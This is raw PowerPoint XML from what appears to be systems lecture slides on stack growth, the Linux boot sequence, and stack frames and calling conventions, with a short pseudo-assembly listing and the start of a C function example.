            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Line 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44E721C8-F949-8445-A05B-538CA4D1B1BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10892392" y="1981200"/>
            <a:ext cx="0" cy="41148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34" name="Line 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{907AC172-4AD2-8B4C-B756-7CD05E2053AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6949871" y="2390775"/>
            <a:ext cx="3505200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Line 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1439E166-6453-0A4E-8013-1F1448DACD9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6949871" y="2619375"/>
            <a:ext cx="3505200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Line 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF3CD85A-6026-FA47-BE1B-1A69B3123EC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6949871" y="3152775"/>
            <a:ext cx="3505200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Line 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{823F80BB-70D5-D443-81B4-8584B5B3BD2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6949871" y="4752975"/>
            <a:ext cx="3505200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Line 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99169377-0810-674E-9BD0-B5D538F7BD49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6949871" y="4981575"/>
            <a:ext cx="3505200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Line 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6458484-FE4F-B541-B4DD-90E094A4CE66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6949871" y="5362575"/>
            <a:ext cx="3505200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Line 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AEB68D3-3C5C-A64F-9ABB-B4D920EC5555}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6949871" y="5591175"/>
            <a:ext cx="3505200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{807F986D-0018-DA40-9A5C-CC927D12948B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6949871" y="2162175"/>
            <a:ext cx="3505200" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Line 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23C31B0B-6509-9049-9D93-30E25C1C8744}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6645071" y="5743575"/>
            <a:ext cx="4038600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Line 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4E66A36-687D-894F-9637-B7C8853CE88E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6645071" y="2133600"/>
            <a:ext cx="4038600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Text Box 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A783181A-C44A-7B45-8165-1DCAAD7C8AEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11101114" y="4283537"/>
            <a:ext cx="1111202" cy="657039"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Growth</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Line 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32B9569D-2C3A-CA4F-9D58-665DB90464CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6949871" y="1600201"/>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49" name="Line 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8729FDE-C8B4-3546-A931-11387934DCB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10458246" y="1600201"/>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50" name="Line 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E890873-DD05-BB44-AB26-8042FE3423FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6953046" y="5305426"/>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51" name="Line 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87690508-1BF6-3B49-8703-2579A9E08087}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10458246" y="5305426"/>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2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBC68982-147B-DB4F-9304-7097F7586A50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8338960" y="1307523"/>
            <a:ext cx="2553432" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Slide from John Mitchell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04CBA562-CEAD-4544-86E5-48FAB029EBCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>109</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="415817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26" y="242693"/>
            <a:ext cx="10707329" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Linux boot</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349191" y="1734056"/>
            <a:ext cx="7875820" cy="4099449"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vmlinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>elf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> file containing the kernel image.  On some systems, it is compressed and put in the file zimage or bzimage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Initramfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is a ram based storage system which is loaded when the kernel is loaded. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Linux boot sequence</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BIOS (PC) or proprietary initial boot code like bootloader.bin on raspberry pi.</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Bootloader (GRUB on PC or U-Boot on IoT):  Load vmlinux usually from a block IO device.</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Vmlinux executes</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Init inside linux starts user mode processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="16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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2049" name="Picture 1" descr="page85image9815680">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B3AC0B5-AB47-4742-8172-E8E2FC3B3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868" y="1025610"/>
            <a:ext cx="3555074" cy="42850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0176A5-4FBD-C647-8926-AC9AFF367208}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9456985" y="5659395"/>
            <a:ext cx="1523174" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>From Hallinan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41182907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74204"/>
            <a:ext cx="11596255" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stack frames and calling conventions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877942" y="1690252"/>
            <a:ext cx="10401481" cy="4666099"/>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First remember stack grows down.  SP (rsp for 64 bit calls) points to the last used location on stack.  </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 normal stack “push” consists of:</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movl  rsp, r2    ; top of stack</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subl  #4, rsp    ; move stack down</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movl  #anyoldthing, (r2)</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Corresponding “pop” is just;</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movl    (rsp), r2</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addl   #4, rsp</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In addition, C++ uses a designated “base pointer,” bp (rbp for 64 bits), which is used to address arguments.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32040089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10046368" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stack frames and calling conventions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379828" y="1487361"/>
            <a:ext cx="11345326" cy="5105067"/>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Here is an example call,  the corresponding assembler is on the next slide: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int callee(int a1, int* a2) {    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  *a2 = a1 + 1; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
